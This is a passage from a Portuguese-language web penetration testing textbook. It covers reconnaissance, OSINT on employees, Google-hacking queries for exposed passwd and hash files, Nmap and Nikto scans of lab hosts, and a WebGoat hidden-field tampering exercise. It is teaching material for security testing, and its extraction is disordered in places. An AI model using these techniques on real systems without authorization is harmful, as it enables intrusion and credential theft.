diversos softwares, como o Apache mod_ssl, Sendmail e OpenCA. Pode ser usado via linha
de comando ou programaticamente, por meio de cdigos escritos em linguagens C e C++. Em
testes de invaso de aplicaes web, empregado para verificar a configurao de SSL/TLS
de servidores web e dos demais elementos do ambiente.
Nikto
Aplicativo livre, fornecido sob licena GPL, que serve para varrer servidores web em busca
de arquivos e diretrios instalados por padro, problemas especficos de verso e configuraes vigentes. A base de dados inclui milhares de itens para inmeras plataformas e atualizada constantemente com novas informaes. Uma informao importante que Nikto
uma ferramenta ruidosa, isto , procura executar a tarefa no menor tempo possvel, sem se
preocupar em ser detectada por sistemas de deteco de intruso.
Metasploit Framework
uma plataforma livre escrita em linguagem Ruby e cujos componentes so desenvolvidos
em C e Assembly. Usada em testes de invaso e criao de ferramentas de segurana,
50
possui uma base de dados de exploits para as mais diversas plataformas, que pode ser
Exploit
estendida pelo prprio analista de segurana. Especificamente para avaliao de segurana
Programa desenvolvido
para explorar uma ou
mais vulnerabilidades
de um sistema ou
ambiente e violar, assim,
requisitos implcitos ou
explcitos de segurana
da informao.
de aplicaes web, pode ser empregada na fase de mapeamento, na explorao de vulnerabilidades nas plataformas subjacentes e na automatizao de diversas tarefas, por exemplo.
Tipos de ferramentas
Que tipos de ferramentas podem ser empregados em um teste de invaso?
Reconhecimento
A fase de reconhecimento tem por objetivo levantar o mximo possvel de informaes
da aplicao alvo, principalmente nos casos de teste caixa-preta, em que quase nada
fornecido de antemo ao analista de segurana.
Embora esta etapa seja fundamental para um teste bem-sucedido, muitas vezes no
executada sistematicamente pelo auditor.
Para que o reconhecimento seja realizado com xito, importante se ter uma ideia do
tipo de informao que deve ser procurada.
1 Nomes de funcionrios.
1 Identificadores de usurios.
1 Informaes diversas sobre usurios.
1 Tecnologias empregadas.
1 Servidores e topologia de rede.
1 Configuraes dos componentes.
1 Recursos disponibilizados pelos servidores web.
1 Arquivos robots.txt.
A lista abaixo ilustra alguns exemplos e as respectivas finalidades em um teste de invaso:
1 Nomes de funcionrios utilizados para compor identificadores de usurios da aplicao, para testes de quebra de autenticao.
1 Identificadores de usurios podem ser usados nos testes de quebra de autenticao e

inferncia da regra empregada para formao de identificadores.
1 Informaes diversas sobre usurios informaes como msicas prediletas, time de

futebol, primeira escola e nomes dos pais, dentre muitas outras, podem favorecer a recuperao de senhas, quando perguntas secretas so utilizadas com esse propsito.
1 Tecnologias empregadas servem para direcionar a identificao e explorao de

vulnerabilidades, pois linguagens de programao e plataformas possuem caractersticas
particulares que devem ser consideradas em um teste. Por exemplo, se a aplicao
escrita em Java, ataques de extravasamento de buffer no costumam ser efetivos, e se
uma verso antiga de Oracle utilizada, h chances de que a conta System com senha
Manager esteja habilitada.
nos servidores, possvel identificar tecnologias empregadas e eventuais canais secundrios de ataque, e, via a topologia de rede, mapear ativos que podem ser usados no
processo de invaso. O conhecimento dos sistemas operacionais utilizados, por sua vez,
permite direcionar ataques que envolvem a interao desta camada com a aplicao.
1 Configuraes dos componentes dependendo da maneira como os elementos que

compem a aplicao esto configurados, alguns ataques podem ou no ser possveis.
1 Recursos disponibilizados pelos servidores web pginas web, cdigo-fonte, cpias de

segurana e arquivos antigos, dentre outros, muitas vezes, esto diretamente acessveis
pelos servidores web. Tais elementos podem revelar detalhes de implementao, problemas existentes, senhas de acesso e interfaces escondidas, por exemplo.
1 Servidores e topologia de rede por meio da deteco de portas e servios habilitados
51
1 Arquivos robots.txt indicam a web spiders partes de um stio web que no devem
ser copiadas, porm, cabe ao software decidir se honra ou no a solicitao. Como os
recursos listados nesses arquivos podem ser acessados, se desejado, eles revelam elementos da aplicao que devem ser mapeados e analisados.
Levantamento de informaes em fontes pblicas

Muitas informaes interessantes para o teste de invaso podem ser obtidas em fontes
pblicas, sem grande esforo. Exemplos:
1 Redes sociais.
1 Grupos de discusso.
1 Anncios de emprego.
1 WHOIS.
1 DNS.
1 Redes sociais nomes de funcionrios, usurios e preferncias pessoais podem ser
encontradas em redes sociais, como Orkut, LinkedIn e Facebook. Vasculhando as comunidades e descries de cada pessoa, tambm, possvel se ter uma noo das tecnologias
empregadas pela empresa e obter respostas para perguntas secretas usadas em mecanismos de recuperao de senhas.
1 Grupos de discusso comum pessoas postarem dvidas em grupos de discusso,

contendo informaes detalhadas do problema, como a dificuldade encontrada, os
arquivos de configurao e as verses dos softwares utilizados. A partir disso, pode-se
identificar algumas das tecnologias empregadas pelo alvo, configuraes dos ativos,
nome de funcionrio e identificador de usurio.
1 Anncios de empregos analisando as vagas de emprego de uma companhia, possvel

descobrir tecnologias utilizadas e eventuais reas carentes de profissionais, o que pode
implicar vulnerabilidades de configurao.
1 WHOIS protocolo utilizado para recuperar diversas informaes sobre um nome de

domnio ou endereo IP, como proprietrios, contatos dos responsveis e servidores
de nome. As informaes fornecidas revelam nomes de funcionrios, e-mails e temas
utilizados na atribuio de nomes de servidores, que podem ser refletidos na escolha de
senhas administrativas.
1 DNS no caso improvvel de uma transferncia de zona estar habilitada para qualquer um,
possvel obter toda a base de dados dos servidores DNS da empresa, contendo nomes de
DNS
servidores e endereos IP. De outro modo, a partir dos registros de servidores de nome e
Domain Name System

um sistema hierrquico
e distribudo de
gerenciamento de
nomes de domnio,
permitindo que estes
sejam traduzidos para
endereos IP e viceversa, no caso de
DNS reverso.
de e-mail, pode-se identificar os temas utilizados na atribuio de nomes para ativos.
Google hacking
Tcnica que utiliza o mecanismo de busca do Google para encontrar vulnerabilidades de
software e de configurao em sistemas acessveis pela internet.

Embora o termo remeta ferramenta especfica do Google, os conceitos so gerais e
podem ser aplicados a outros servios similares.
O uso em avaliaes de segurana possvel, porque esses mecanismos armazenam quase
tudo que encontram pela frente em uma gigantesca base de dados, que disponibilizada
para consultas baseadas em palavras e frases. Desse modo, o auditor de segurana pode ter
acesso a itens especficos, sem a necessidade de contatar o servidor web original da aplicao.
52
A partir disso, fica fcil perceber o valor de Google hacking para um teste de invaso em aplicaes web, na fase de reconhecimento, quando informaes preliminares sobre o alvo so
levantadas. Observe-se, entretanto, que a tcnica no aplicvel para sistemas acessveis
somente pela rede interna, uma vez que os recursos da aplicao no podem ser catalogados pelo mecanismo de busca. Isto verdade se um clone ou uma adaptao do sistema
no for disponibilizado, separadamente, para usurios externos. Neste caso, a tendncia
que os servidores dos dois ambientes sejam configurados de maneira muito prxima, seno
igual, e, assim, vulnerabilidades em um lado provavelmente se refletem no outro.
Antes de apresentar algumas consultas interessantes para testes de invaso, fundamental
fixar conceitos importantes sobre como elas so interpretadas e executadas, como devem
ser refinadas e os operadores avanados existentes.
Regras bsicas
Os seguintes itens representam os conceitos bsicos necessrios para se realizar uma
consulta ao mecanismo de busca do Google:
1 O comportamento padro do Google considerar todas as palavras fornecidas,

exceto as comuns, que podem ser ignoradas.
1 O smbolo * pode ser usado para substituir um ou mais termos desconhecidos

na consulta.
1 No h diferenciao entre letras maisculas e minsculas, exceto para o operador

OR, discutido abaixo.
1 Os termos fornecidos so procurados em qualquer lugar de uma pgina, incluindo

ttulo, corpo e URL.
1 Delimitar com aspas duplas um conjunto de palavras determina que estas sejam
agrupadas como uma frase, que deve aparecer exatamente igual nos resultados.
1 No so considerados mais que 32 termos na pesquisa e tudo que excede este limite
descartado pelo mecanismo.
1 A ordem das palavras afeta o resultado da busca.

1 O operador OR deve ser escrito em maisculas e seleciona as pginas que contm
pelo menos um dos termos. Lembre-se que, normalmente, todos os termos so considerados, isto , o operador AND empregado por padro.
1 O operador -, quando precedido de um espao, indica que nenhuma pgina com o

termo imediatamente posposto deve fazer parte do resultado.
relevante para a pesquisa, mas ignorado pelo Google, por ser uma palavra
comum ou caractere.
Alm disso, ele serve para desabilitar sinnimos, indicando que o termo no deve ser substitudo por outro de mesmo significado. Por exemplo, uma pesquisa por prefeitura sp
(sem as aspas) tambm traz pginas que contm o termo So Paulo em vez de sp. Se sp
for precedido por +, por outro lado, pginas que contenham somente So Paulo e no
sp sero excludas do resultado. Circundar a palavra por aspas duplas apresenta exatamente o mesmo efeito.
1 O operador + deve ser precedido de um espao e usado quando o termo posposto
53
Operadores avanados
Existem diversos operadores avanados que podem ser utilizados para refinar os resultados
de uma busca e os seguintes itens devem ser observados no uso deles (Long et al, 2008):
1 A sintaxe bsica de um operador avanado operador:termo de busca, sem

nenhum espao entre os elementos.
1 O termo de busca pode ser uma nica palavra ou uma frase entre aspas duplas.
1 Uma pesquisa pode conter termos simples misturados com operadores avanados,
desde que as sintaxes sejam respeitadas.
1 Operadores que comeam com all, normalmente, no se do bem com outros operadores e, portanto, devem ser empregados sozinhos.
1 Os operadores - e OR podem ser aplicados a operadores avanados.

Uma explicao para todos os operadores avanados vai muito alm do escopo do presente texto e, assim, somente alguns deles sero abordados.
1 site
1 intitle
1 allintitle
1 inurl
1 allinurl
1 filetype
1 link
1 author
1 site restringe a busca a pginas do domnio especificado e, assim, deve ser usado em
testes de invaso para limitar os resultados ao escopo do trabalho. Ex.: a pesquisa site:esr.
rnp.br enumera apenas as pginas do domnio da Escola Superior de Redes da RNP.
1 intitle por padro, os termos de busca so pesquisados em qualquer lugar das pginas
contidas na base de dados do Google. Para limitar a pesquisa ao ttulo delas, isto , ao
texto delimitado pelo marcador TITLE, este operador deve ser empregado. Ex.: a pesquisa intitle:index of retorna pginas que contm index of no ttulo, o que comum
quando a navegao de diretrios est habilitada no servidor web.
1 allintitle similar a intitle, determina que todos os termos pospostos devem estar
presentes no ttulo da pgina. Ex.: para encontrar pginas cujos ttulos contm index of
e imagens, a pesquisa allintitle:index of imagens pode ser utilizada.
1 inurl a palavra ou frase deve aparecer na URL do recurso. Ex.: a pesquisa inurl:admin
lista pginas que contm admin na URL e pode ser utilizada para encontrar eventuais
pginas administrativas da aplicao.
1 allinurl todos os termos pospostos devem fazer parte da URL. Ex.: allinurl:admin password.
1 filetype instrui o Google a listar somente arquivos de um determinado tipo. Ex.: para
encontrar arquivos de configurao, pode-se utilizar a busca filetype:conf.
1 link permite encontrar pginas que possuam links para o domnio especificado.
Ex.: link:rnp.br.
1 author vlido para o Google Groups, permite listar mensagens postadas pelo autor
especificado. Ex.: author:stallman lista mensagens cujos autores tm Stallman como
parte do nome.
54
Exemplos de consultas
Vejamos alguns exemplos de consultas para encontrar na internet tudo que se possa imaginar, desde cmeras IP at arquivos de senhas de usurios. Considerando a utilidade da
tcnica, recomenda-se gastar algum tempo estudando as pesquisas existentes na base, as
quais podem ajudar a encontrar as informaes desejadas de uma aplicao.
site:<domnio> login OR logon

Lista pginas empregadas para autenticao de usurios.
site:<domnio> inurl:temp OR inurl:tmp OR inurl:backup OR inurl:bak

Tem por objetivo encontrar arquivos temporrios ou cpias de segurana presentes em
servidores web do domnio especificado.
site:<domnio> intitle:index.of people.lst

Localiza arquivos contendo identificadores de usurios e hashes de senhas.
site:<domnio> intitle:index of etc passwd

Procura arquivos /etc/passwd acessveis pela internet.
site:<domnio> This file was generated by Nessus

Encontra relatrios gerados pela ferramenta Nessus, que podem indicar vulnerabilidades
presentes no ambiente.
Os exemplos ilustrados nesta seo foram extrados do Google Hacking Database, de
Johnny Long.
Identificao de sistema operacional, servios e portas

Para cada ativo descoberto ou listado pelo cliente, deve-se identificar o nome e verso
do sistema operacional, alm dos servios e portas habilitados.

Uma das maneiras de realizar esta tarefa escutar passivamente todo o trfego de
entrada e sada do elemento e, com base em detalhes especficos de plataforma, inferir
as informaes desejadas.
O lado positivo desta abordagem que, normalmente, no deixa rastros, uma vez que
lista ser capaz de escutar o trfego da rede.
A outra estratgia ativa, isto , a identificao ocorre por meio de interao com o
servidor ou elemento de rede.

Dependendo do tempo disponvel, pode-se diminuir a velocidade com que a verificao
executada, para no gerar tantos alertas nos sistemas de deteco de intruso. Um utilitrio
que pode ser empregado com esta finalidade o Nmap, conforme exemplo a seguir:
esruser@ubuntu:~$ nmap -A -T4 192.168.1.1

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-06 16:40 BRST
Interesting ports on 192.168.1.1:
Not shown: 997 filtered ports
PORT
nenhum pacote enviado ao alvo. Por outro lado, num teste caixa-preta, dificilmente o ana-
STATE SERVICE VERSION
55
21/tcp open
ftp
Netgear broadband router or ZyXel VoIP adapter
telnet
Netgear broadband router or ZyXel VoIP adapter
http
Embedded Allegro RomPager webserver 4.07
ftpd 1.0
23/tcp open
telnetd
80/tcp open
UPnP/1.0 (ZyXEL ZyWALL 2)

|_ html-title: Protected Object
|
http-auth: HTTP Service requires authentication
Auth type: Basic, realm = 550B-4P2
|_
HTTP server may accept admin:admin combination for Basic
authentication
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
No comando acima, a opo -A habilita a deteco de nome e verso de sistema operacional, o mdulo NSE e o traceroute, enquanto a opo -T4 faz com que a varredura seja
executada mais rapidamente. Observe-se que foram encontrados os servios FTP, telnet e
HTTP abertos, que este ltimo emprega autenticao bsica HTTP e que foi detectado um
usurio admin com senha admin. Tal achado, nesta etapa, uma grande descoberta, pois
j permite acesso administrativo aplicao logo no incio do trabalho.
Observamos que o Nmap realizou a identificao do servidor web, graas opo -A.
Porm, isto faz com que o processo seja executado para todos os servios disponveis no
ativo, o que nem sempre desejvel. Isso pode ser resolvido pela opo -p, que restringe
as portas que sero analisadas.
Identificao do servidor web

Existem mtodos e utilitrios que podem ser utilizados especificamente para reconhecer
servidores web, e sempre interessante conferir o resultado com mais de uma soluo.
A possibilidade mais simples solicitar um recurso inexistente para o servidor web e
observar a pgina de erro resultante. Caso uma pgina personalizada no tenha sido
configurada, a padronizada exibida, a qual contm informaes sobre o servidor utilizado, conforme ilustrado na Figura 2.6.
Uma alternativa que fornece resultados semelhantes procurar por contedo instalado por
padro pelos softwares. importante mencionar que esse mtodo no muito confivel,
pois extremamente fcil configurar essas pginas, em plataformas diferentes, com o
intuito de enganar eventuais atacantes.
56
Figura 2.6
Tela padro de erro
do Apache.
Um mtodo mais robusto de reconhecimento de servidores web envolve analisar o com-
portamento deles em diversas situaes, pois este varia bastante de fornecedor para
fornecedor, servindo assim como um discriminante (Meucci et al., 2008).
Itens que podem ser observados incluem o valor do cabealho Server, a ordem dos cabealhos em respostas e o tratamento de requisies mal formadas ou com protocolos e verses
inexistentes, dentre outros. O exemplo abaixo ilustra a disposio dos cabealhos em uma
resposta a uma requisio HEAD, feita para os servidores Apache, lighttpd, nginx e Tomcat.
Apache 2.2.17
HTTP/1.1 200 OK
0 Date: Wed, 05 Jan 2011 13:53:25 GMT
1 Server: Apache/2.2.17 (Fedora)
2 Last-Modified: Mon, 22 Nov 2010 01:40:24 GMT
3 ETag: 61c27-5056-4959a57036427
4 Accept-Ranges: bytes
5 Content-Length: 20566
7 Content-Type: text/html; charset=iso-8859-1
lighttpd 1.4.26
HTTP/1.0 200 OK
7 Content-Type: text/html
3 ETag: 852229764
2 Last-Modified: Mon, 22 Oct 2007 12:13:49 GMT
6 Connection: close
0 Date: Wed, 05 Jan 2011 13:56:56 GMT
6 Connection: close
1 Server: lighttpd/1.4.26
57
nginx 0.8.53
HTTP/1.1 200 OK
1 Server: nginx/0.8.53
0 Date: Wed, 05 Jan 2011 13:57:59 GMT
2 Last-Modified: Sun, 31 Oct 2010 21:12:28 GMT
6 Connection: close
Tomcat 6.0.26
HTTP/1.1 200 OK
1 Server: Apache-Coyote/1.1
3 ETag: W/7777-1291366189000
2 Last-Modified: Fri, 03 Dec 2010 08:49:49 GMT
0 Date: Wed, 05 Jan 2011 14:00:19 GMT
6 Connection: close
Obviamente, realizar testes dessa natureza manualmente completamente invivel e,
portanto, necessrio automatizar a tarefa com uma ferramenta como o httprint, da
net-square. Este utilitrio bem interessante e prtico, mas requer que o arquivo de assinaturas seja atualizado, para que novas verses de servidores web sejam corretamente
identificadas. A Figura 2.7 ilustra o resultado de um teste, empregando a base padro contra
um servidor Apache 2.2.17.
58
Figura 2.7
Sada do httprint
em teste de servidor Apache.
Levantamento dos mtodos suportados pelos servidores web

H mtodos interessantes, como PUT, que permitem copiar arquivos para o servidor.
Isso pode ser muito til para carregar ferramentas em uma mquina da rede que esteja
servindo de piv para atacar outro ativo do ambiente.
Assim, vantajoso saber os mtodos suportados por um servidor web, e uma maneira
direta de conseguir isto por meio do mtodo OPTIONS, caso esteja habilitado.
esruser@ubuntu:~$ nc exemplo.esr.rnp.br 8080

OPTIONS / HTTP/1.0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
Content-Length: 0
Date: Wed, 05 Jan 2011 16:16:12 GMT
Connection: close
Se o mtodo OPTIONS no for suportado, a sada ser semelhante abaixo:
esruser@ubuntu:~$ nc exemplo.esr.rnp.br 8090

OPTIONS / HTTP/1.0
HTTP/1.1 405 Not Allowed
Server: nginx/0.8.53
Date: Wed, 05 Jan 2011 16:23:21 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
Neste caso, uma soluo consiste em se criar um script para fazer requisies ao servidor
web, para todos os mtodos existentes, e observar aqueles que so aceitos. possvel,
tambm, empregar o Nikto e aproveitar-se de diversas outras verificaes de configurao
que ele faz contra o servidor.
Deteco de hosts virtuais

muito comum hospedar diversos stios web em um nico servidor, com o objetivo de
Na primeira delas, conhecida por hospedagem virtual baseada em IP, cada stio recebe
um endereo IP diferente, que remete para o mesmo servidor fsico. Na outra, chamada
de hospedagem virtual baseada em nomes, diversos nomes de domnio so resolvidos
para um mesmo endereo IP e cabe ao servidor web discernir qual host virtual deve
tratar a requisio recebida.
A soluo para a questo acima reside no cabealho Host, que deve indicar o nome de
domnio do destino. Se ele no estiver presente, a requisio encaminhada para o host
padro, que nem sempre o correto.
Portanto, sempre que ferramentas como Netcat e Telnet ou scripts personalizados forem
utilizados para acessar aplicaes em servidores compartilhados, no se deve esquecer de
inclui-lo, sob pena de no se alcanar os resultados desejados.
melhor alocar os recursos disponveis, e, para isso, duas tcnicas podem ser utilizadas.
59
Um teste simples para detectar o uso de servidor compartilhado por nomes consiste em
resolver o nome de domnio da aplicao e tentar o acesso por endereo IP, o que faz
com que a requisio seja tratada pelo host padro.
Se este no for o responsvel por atender a aplicao, a pgina inicial de outro stio web
exibida, o que implica que o servidor no dedicado. Em caso contrrio, o mtodo no
capaz de fornecer uma resposta conclusiva.
Outra maneira de testar o compartilhamento de servidor por meio de ferramentas
web que mapeiam endereos IP para nomes de domnio, de maneira similar a um DNS
reverso (Meucci et al., 2008).
Para exemplificar, a Figura 2.8 ilustra a sada de uma consulta realizada para o IP
200.219.245.136 ao servio WebHosting Info, a qual indica claramente a adoo de hospedagem virtual baseada em nomes.
Figura 2.8
Consulta realizada
ao servio
WebHosting Info.
Descoberta de arquivos e diretrios

Google hacking uma tcnica interessante que pode ser utilizada para encontrar
arquivos e diretrios em servidores, sem alertar os mecanismos de monitorao do

ambiente, uma vez que toda informao pode ser recuperada diretamente da base do
60
Google ou outro mecanismo de busca.

Uma abordagem mais agressiva consiste no uso de ferramentas como o Nikto, que testam
a presena de diversos itens de configurao, de acordo com uma base pr-cadastrada.
O relatrio abaixo resultado de um teste efetuado pelo Nikto contra uma mquina executando a distribuio Damn Vulnerable Linux. Observe-se que diversos diretrios e potenciais vulnerabilidades foram encontrados pelo utilitrio e que o tempo de varredura, nove
segundos, extremamente baixo.
esruser@ubuntu:~$ nikto -host dvl.esr.rnp.br

- Nikto v2.03/2.04
--------------------------------------------------------------------------+ Target IP:
192.168.213.100
+ Target Hostname:
dvl.esr.rnp.br
+ Target Port:
80
+ Start Time:
2011-01-08 11:07:20
--------------------------------------------------------------------------+ Server: Apache/1.3.37 (Unix) PHP/4.4.4

+ No CGI Directories found (use -C all to force check all possible
dirs)
- Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP method (Allow Header): TRACE is typically only
used for debugging and should be disabled. This message does not
mean it is vulnerable to XST.
+ Apache/1.3.37 appears to be outdated (current is at least
Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ PHP/4.4.4 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: GET /./ : Appending /./ to a directory allows indexing
+ OSVDB-0: GET /%2e/ : Weblogic allows source code or directory
listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.
com/bid/2513.
+ OSVDB-877: TRACK / : TRACK option (TRACE alias) appears to allow
XSS or credential theft. See http://www.cgisecurity.com/whitehatmirror/WhitePaper_screen.pdf for details
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or
credential theft. See http://www.cgisecurity.com/whitehat-mirror/
WhitePaper_screen.pdf for details
+ OSVDB-119: GET /?PageServices : The remote server may allow
directory listings through Web Publisher by forcing the server
to show all files via open directory browsing. Web Publisher
should be disabled. http://cve.mitre.org/cgi-bin/cvename.
cgi?name=CVE-1999-0269.
+ OSVDB-119: GET /?wp-cs-dump : The remote server may allow
directory listings through Web Publisher by forcing the server
to show all files via open directory browsing. Web Publisher
should be disabled. http://cve.mitre.org/cgi-bin/cvename.
+ OSVDB-3092: GET /info/ : This might be interesting...
+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: GET /manual/ : Web server manual found.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /
manual/images
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 16 item(s) reported on remote host
cgi?name=CVE-1999-0269.
61
+ End Time:
2011-01-08 11:07:29 (9 seconds)
--------------------------------------------------------------------------+ 1 host(s) tested
Test Options: -host dvl.esr.rnp.br
---------------------------------------------------------------------------
Fase de reconhecimento
Que informaes devem ser obtidas na fase de reconhecimento?
Mapeamento
Na fase de mapeamento, deve ser criado um mapa da aplicao, que reflita a estruturao
dos arquivos componentes, as funcionalidades ofertadas, os pontos de entrada de informao e as tecnologias utilizadas. Tudo isso realizado por meio dos seguintes passos:
1 Cpia das pginas e recursos da aplicao.

1 Identificao dos pontos de entrada de informao.
1 Relacionamento com as informaes de reconhecimento.
Cpia das pginas e recursos da aplicao

Este primeiro passo consiste em realizar uma cpia integral das partes acessveis da
aplicao, iniciando pela pgina inicial e incluindo quaisquer pginas que tenham sido
descobertas na fase de reconhecimento.
Esta tarefa, obviamente, no deve ser feita de maneira manual, gravando-se, por meio
do navegador, cada uma das pginas visitadas. Por outro lado, viu-se que uma estratgia totalmente automatizada tambm no adequada, pois pode ocorrer de itens no
serem cobertos, ou pginas perigosas, acessadas. Assim, uma abordagem hbrida deve
ser empregada, na qual o auditor navega pela aplicao, enquanto que um web spider
grava as pginas e monta o mapa automaticamente.
Uma vantagem clara desse mtodo que as dificuldades encontradas por esse tipo de
software, como interpretao de Javascript, autenticao e processos de mltiplos estgios,
62
so superadas, porque estas tarefas ficam a cargo do analista.

A Figura 2.9 ilustra o mapa de uma aplicao, gerado pelo software Burp Suite por meio
desta abordagem. O lado esquerdo da interface mostra a estrutura da aplicao, indicando,
neste exemplo, diretrios, arquivos e funcionalidades definidas por parmetros passados a
scripts PHP. Na parte direita superior, um resumo da requisio e da resposta, relacionadas
ao elemento selecionado, apresentado e, na parte inferior, detalhes so fornecidos.
O arquivo accounts.txt, exibido na figura, contm usurios e senhas do sistema e foi descoberto automaticamente a partir do contedo do arquivo robots.txt.
Neste processo, comum que recursos ainda no mapeados sejam revelados, por meio
de links ou comentrios nas pginas capturadas. Esses elementos podem englobar, por
exemplo, funcionalidades desativadas ou futuras, pginas antigas, pginas privilegiadas
que no esto visveis para o perfil de acesso atual, servidores auxiliares e plataformas
de desenvolvimento e teste.
Todas as novas funcionalidades e pginas descobertas tambm devem ser copiadas e fazer
parte do mapa da aplicao. No caso dos novos servidores, deve-se voltar atividade de reconhecimento, se fizerem parte do escopo contratado. Seno, importante discutir com o cliente
a necessidade de inclui-los no teste, considerando que no sejam de uma empresa externa.
Recursos escondidos, muitas vezes, podem ser encontrados a partir dos elementos
j mapeados. Para isso, inicialmente, necessrio analisar o resultado obtido at o

momento e observar os nomes de arquivos, diretrios e parmetros.
Para cada arquivo da lista, deve-se efetuar requisies, variando-se a extenso para outras,
como .bak, .old, .tmp e .inc. Em seguida, caso um padro de nomes tenha sido identificado,
itens cujos nomes o satisfaam devem ter a existncia verificada (Stuttard e Pinto, 2007).
Por exemplo, se o mapa contiver arquivos AddUser.asp e ViewUser.asp, existe uma chance
que RemoveUser.asp, UpdateUser.asp e DisableUser.asp tambm sejam vlidos.
Identificao dos pontos de entrada de informao

Muitas vulnerabilidades ocorrem justamente porque este preceito no observado e
informaes fornecidas pelos usurios so utilizadas, sem antes serem devidamente
validadas. Por esse motivo, torna-se evidente a importncia de se mapear os pontos de
Figura 2.9
Cpia de aplicao
com Burp Suite.
entrada de informao, pois por meio da explorao deles que muitos problemas na
aplicao alvo sero descobertos.
63
Conforme Meucci et al (2008) e Sttutard e Pinto (2007), os seguintes elementos devem
ser levantados:
1 Parmetros passados no corpo de requisies POST, principalmente, campos escondidos, que no so visveis pela interface da aplicao.
1 Parmetros passados via URL em requisies GET. Considere-se que nem sempre os
delimitadores-padro so utilizados.
1 Cookies e os lugares em que so definidos e modificados.

1 Cabealhos que tendem a ser processados pela aplicao, como User-Agent,
Referer e Host.
1 Cabealhos no padronizados utilizados em requisies GET e POST.

1 Canais secundrios que podem ser controlados pelo usurio. Por exemplo, um
servidor de arquivos de rede que permite submeter arquivos pelo protocolo FTP e
visualiz-los em uma interface web.
Uma regra de ouro para o desenvolvimento de softwares seguros que todo usurio deve
ser considerado malicioso e, portanto, nunca se deve confiar em nada que ele fornece.
Relacionamento com as informaes de reconhecimento

Neste ponto, algumas das informaes levantadas na fase de reconhecimento j devem
ter sido utilizadas no processo de cpia dos arquivos da aplicao. Falta ainda, porm,
relacionar todas as funcionalidades mapeadas aos servidores e tecnologias identificados.
Isto importante por uma srie de razes:
1 H vulnerabilidades que afetam apenas linguagens e plataformas especficas.

1 Ataques que envolvem interao com o sistema operacional devem utilizar os comandos
especficos da plataforma.
1 Sistemas gerenciadores de bancos de dados relacionais possuem peculiaridades na

sintaxe de comandos SQL, que devem ser respeitadas na construo de ataques.
1 Relaes de confiana entre servidores e o posicionamento na topologia de rede permitem identificar elementos estratgicos que devero ser explorados para o controle
completo do ambiente.
1 Problemas de configurao nas plataformas subjacentes podem invalidar mecanismos de

segurana implementados na aplicao ou facilitar a execuo de ataques.
Validao unilateral
64
comum encontrar aplicaes que validam entradas somente no lado cliente?
Descoberta de vulnerabilidades e explorao

Aps realizar todo o levantamento e mapeamento da aplicao, prossegue-se etapa
de descoberta de vulnerabilidades, para posterior explorao. Com um pouco de sorte,

algumas fraquezas, como utilizao de usurios e senhas-padro, so encontradas logo
nas fases iniciais do teste de invaso. Para a maioria dos casos, porm, testes especficos para cada tipo de problema possvel devem ser executados, sempre guiados pelas
informaes coletadas.
No restante deste livro, os mtodos empregados para deteco e explorao de vulnerabilidades sero apresentados, iniciando-se pelo abuso de controles no lado cliente do sistema.
Explorao de controles no lado cliente

Um fato importante que muitas vezes esquecido ou ignorado por desenvolvedores
de aplicaes web que, de modo geral, controles que so executados no lado cliente
podem ser violados com as ferramentas e conhecimentos apropriados.
Em alguns casos, o esforo necessrio para comprometer o controle mnimo; em outros,
uma base slida de engenharia reversa necessria, mas a tarefa ainda possvel. Desse
modo, esses mecanismos podem ser utilizados para auxiliar na interao do usurio com a
aplicao, evitando trfego de dados invlidos pela rede, em caso de erros, mas no como o
nico ponto para validao de entradas.
O caso clssico deste problema, que afetou diversas lojas virtuais, nos princpios do
comrcio eletrnico, o armazenamento de preos em campos escondidos, para uso no

clculo da fatura a ser paga pelo cliente.
As motivaes por trs desta abordagem so facilitar o desenvolvimento da aplicao, diminuindo a interao com o banco de dados, e prover segurana por obscuridade, baseada no
falso pensamento de que o campo escondido no ser modificado, porque ele no visvel
aos usurios.
O mtodo mais simples de violar o uso de campos escondidos consiste em gravar o for-
mulrio localmente, editar o valor do campo, recarregar o formulrio em um navegador

e submet-lo ao servidor (Stuttard e Pinto, 2007).
Uma abordagem mais elegante e prtica, contudo, utilizar um proxy de interceptao, para
alterar as informaes desejadas, em tempo de execuo, antes que a requisio deixe a
restries impostas a campos de formulrios e validao baseada em cdigo Javascript.
O prximo exemplo, baseado no WebScarab e WegGoat, ilustra mais detalhadamente como
este tipo de vulnerabilidade pode ser explorado. A Figura 2.10 mostra o exerccio sobre explorao de campos escondidos do WegGoat, que simula uma aplicao de comrcio eletrnico.
mquina do usurio. Esta tcnica bem verstil e tambm pode ser empregada para quebrar
65
Figura 2.10
WebGoat: exerccio
sobre explorao de
campo escondido.
A interface bem simples e permite que o usurio altere a quantidade do elemento

presente no carrinho de compras ou que efetive o pedido, clicando no boto Purchase.
Quando isto acontece, a seguinte requisio enviada para o servidor web:
POST http://webgoat.esr.rnp.br:8080/webgoat/
attack?Screen=60&menu=1700 HTTP/1.1
Host: webgoat.esr.rnp.br:8080
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13)
Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.7,pt-br;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://webgoat.esr.rnp.br:8080/webgoat/
attack?Screen=60&menu=1700
Cookie: JSESSIONID=325E4532DAA7BD43EA8C2AE5824783C0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Content-Type: application/x-www-form-urlencoded
Content-length: 35
66
